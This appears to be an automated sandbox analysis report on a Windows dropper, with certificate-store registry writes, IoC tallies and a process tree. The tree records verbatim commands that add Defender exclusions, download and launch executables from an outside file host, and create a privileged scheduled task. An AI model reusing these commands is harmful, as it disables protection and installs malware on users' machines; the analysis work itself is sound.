b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b5
47c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Setup (19).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 
190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e
0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07e
ccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508
b2fadb6975f6082d11f Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a7
32259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f GameBoxWin64.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process
2532 PING.EXE
8292 PING.EXE
-
Script User-Agent 32 IoCs
Uses user-agent string associated with script host/environment.
description: HTTP User-Agent header
ioc: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
flow: 207, 441, 139, 143, 193, 209, 345, 134, 338, 445, 138, 206, 210, 223, 389, 378, 416, 176, 199, 220, 252, 377, 183, 423, 202, 204, 213, 350, 174, 388, 418, 453
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3016 Process not Found -
Suspicious behavior: MapViewOfSection 23 IoCs
Suspicious behavior: SetClipboardViewer 4 IoCs
pid Process 5744 4164647.exe 6892 5515754.exe 8324 RuntimeBroker.exe 6024 RuntimeBroker.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 64 IoCs
Suspicious use of SendNotifyMessage 62 IoCs
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3016 Process not Found 6788 MicrosoftEdge.exe 8948 MicrosoftEdgeCP.exe 8892 cmd.exe 8948 MicrosoftEdgeCP.exe 5176 MaskVPNUpdate.exe 5204 MicrosoftEdge.exe 2416 MicrosoftEdgeCP.exe 2416 MicrosoftEdgeCP.exe 6404 MicrosoftEdge.exe 4644 MicrosoftEdgeCP.exe 4644 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1232
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1408
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1820
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1192
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2492
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2448
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1056
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:788 -
C:\Users\Admin\AppData\Roaming\cfsafjcC:\Users\Admin\AppData\Roaming\cfsafjc2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6596
-
-
C:\Users\Admin\AppData\Roaming\cfsafjcC:\Users\Admin\AppData\Roaming\cfsafjc2⤵
- Suspicious behavior: MapViewOfSection
PID:7324
-
-
C:\Users\Admin\AppData\Roaming\cfsafjcC:\Users\Admin\AppData\Roaming\cfsafjc2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3420
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2836
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2764
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2708
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:1004
-
C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exe"C:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exe"2⤵
- Executes dropped EXE
PID:3676 -
C:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exeC:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4360
-
-
-
C:\Users\Admin\Documents\uwtBY5_fgfWhsQUfzRGn9ts8.exe"C:\Users\Admin\Documents\uwtBY5_fgfWhsQUfzRGn9ts8.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
C:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exe"C:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exeC:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
-
-
C:\Users\Admin\Documents\WgAQMBbuvnZa4Uim1cKe4vXj.exe"C:\Users\Admin\Documents\WgAQMBbuvnZa4Uim1cKe4vXj.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
C:\Users\Admin\Documents\4g9oUp8jAFefeykFTkbWSBy4.exe"C:\Users\Admin\Documents\4g9oUp8jAFefeykFTkbWSBy4.exe"2⤵
- Executes dropped EXE
PID:4044 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit3⤵PID:4824
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵PID:4428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵PID:7116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'4⤵PID:6724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'4⤵PID:7876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')4⤵PID:9132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')4⤵
- Blocklisted process makes network request
PID:5372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')4⤵PID:9172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'4⤵PID:6812
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"5⤵PID:1868
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit6⤵PID:2300
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵PID:388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵PID:188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵PID:1328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'7⤵PID:8972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"6⤵PID:8816
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:6276
-
-
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"7⤵PID:4932
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit8⤵PID:5624
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'9⤵
- Creates scheduled task(s)
PID:6944
-
-
-
C:\Windows\system32\services32.exe"C:\Windows\system32\services32.exe"8⤵PID:6860
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit9⤵PID:9060
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'10⤵PID:8508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'10⤵PID:8828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'10⤵PID:8636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'10⤵PID:8840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"9⤵PID:9156
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SendNotifyMessage
PID:8544
-
-
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"10⤵
- Drops file in System32 directory
PID:7556 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit11⤵
- Drops file in System32 directory
PID:4932 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:5624
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'12⤵
- Creates scheduled task(s)
PID:7744
-
-
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"11⤵PID:7460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"11⤵PID:4156
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 312⤵PID:4836
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"8⤵PID:6548
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵PID:9168
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'4⤵PID:7976
-
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"5⤵
- Adds Run key to start application
- Suspicious behavior: SetClipboardViewer
PID:8324
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'4⤵PID:8504
-
C:\Users\Admin\AppData\Local\Temp\launcher.exe"C:\Users\Admin\AppData\Local\Temp\launcher.exe"5⤵
- Suspicious use of SetThreadContext
PID:8144 -
C:\Users\Admin\AppData\Local\Temp\launcher.exe"{path}"6⤵PID:1784
-
-
-
-
-
-
C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe"C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exeC:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe3⤵
- Executes dropped EXE
PID:4388
-
-
C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exeC:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4564
-
-
-
C:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exe"C:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exeC:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
-
-
C:\Users\Admin\Documents\Jehn52WtbMKZ9kxobh4J4A03.exe"C:\Users\Admin\Documents\Jehn52WtbMKZ9kxobh4J4A03.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe"C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe"2⤵
- Executes dropped EXE
PID:2160 -
C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe"C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe" -q3⤵PID:5032
-
-
-
C:\Users\Admin\Documents\0NKIqxJZOxkSqcoqQk5gff41.exe"C:\Users\Admin\Documents\0NKIqxJZOxkSqcoqQk5gff41.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Users\Admin\Documents\H_GAN4lymZYNIe2SYb1o6PjL.exe"C:\Users\Admin\Documents\H_GAN4lymZYNIe2SYb1o6PjL.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3820
-
-
C:\Users\Admin\Documents\9V6mnXHdynq1s7PpT244URZa.exe"C:\Users\Admin\Documents\9V6mnXHdynq1s7PpT244URZa.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
C:\Users\Admin\Documents\qhRWdCBRrOEeIDbo7QDZo256.exe"C:\Users\Admin\Documents\qhRWdCBRrOEeIDbo7QDZo256.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2624 -
C:\Users\Admin\AppData\Roaming\4726380.exe"C:\Users\Admin\AppData\Roaming\4726380.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
